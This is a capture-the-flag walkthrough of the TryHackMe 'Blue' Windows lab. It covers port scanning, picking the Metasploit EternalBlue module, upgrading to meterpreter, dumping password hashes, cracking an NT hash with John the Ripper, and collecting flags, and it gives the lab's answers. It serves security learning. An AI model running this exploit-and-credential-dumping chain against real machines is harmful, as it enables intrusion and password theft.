Blue
- π Website: TryHackMe
- π₯ Level: Easy
- π₯οΈ OS: Windows
- π Link: Blue
Recon¶
β Question¶
How many ports are open with a port number under 1000?
π Walkthrough¶
Let's start with an nmap:
βββ(kaliγΏkali)-[~/Desktop/THM]
ββ$ nmap --min-rate=10000 10.10.101.136 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-27 11:58 CEST
Warning: 10.10.101.136 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.101.136
Host is up (0.052s latency).
Not shown: 65382 closed tcp ports (reset), 144 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
Answer
3
Gain Access¶
β Question¶
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
π Walkthrough¶
Let's search for an exploit for EternalBlue:
Answer
exploit/windows/smb/ms17_010_eternalblue
β Question¶
Show options and set the one required value. What is the name of this value? (All caps for submission)
π Walkthrough¶
Let's show the options for the exploit:
Answer
RHOSTS
Escalate¶
β Question¶
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
π Walkthrough¶
Let's search for the post module:
Answer
post/multi/manage/shell_to_meterpreter
β Question¶
Select this (use MODULE_PATH). Show options, what option are we required to change?
π Walkthrough¶
Let's use the post module:
Answer
SESSION
Cracking¶
β Question¶
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
π Walkthrough¶
Let's run the command:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[REDACTED]:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Answer
Jon
β Question¶
Copy this password hash to a file and research how to crack it. What is the cracked password?
π Walkthrough¶
βββ(kaliγΏkali)-[~/Desktop/THM]
ββ$ echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::"> hash
βββ(kaliγΏkali)-[~/Desktop/THM]
ββ$ john hash -w=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=24
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (Jon)
1g 0:00:00:00 DONE (2025-09-27 13:17) 3.225g/s 32904Kp/s 32904Kc/s 32904KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
Answer
alqfna22
Find flags!¶
β Question¶
Flag1? This flag can be found at the system root.
π Walkthrough¶
Answer
`flag{access_the_machine}
β Question¶
Flag2? This flag can be found at the location where passwords are stored within Windows.
π Walkthrough¶
Answer
flag{sam_database_elevated_access}
β Question¶
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
π Walkthrough¶
C:\Users\Jon>dir Documents
dir Documents
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Documents
12/12/2018 10:49 PM <DIR> .
12/12/2018 10:49 PM <DIR> ..
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
2 Dir(s) 20,329,848,832 bytes free
Answer
flag{admin_documents_can_be_valuable}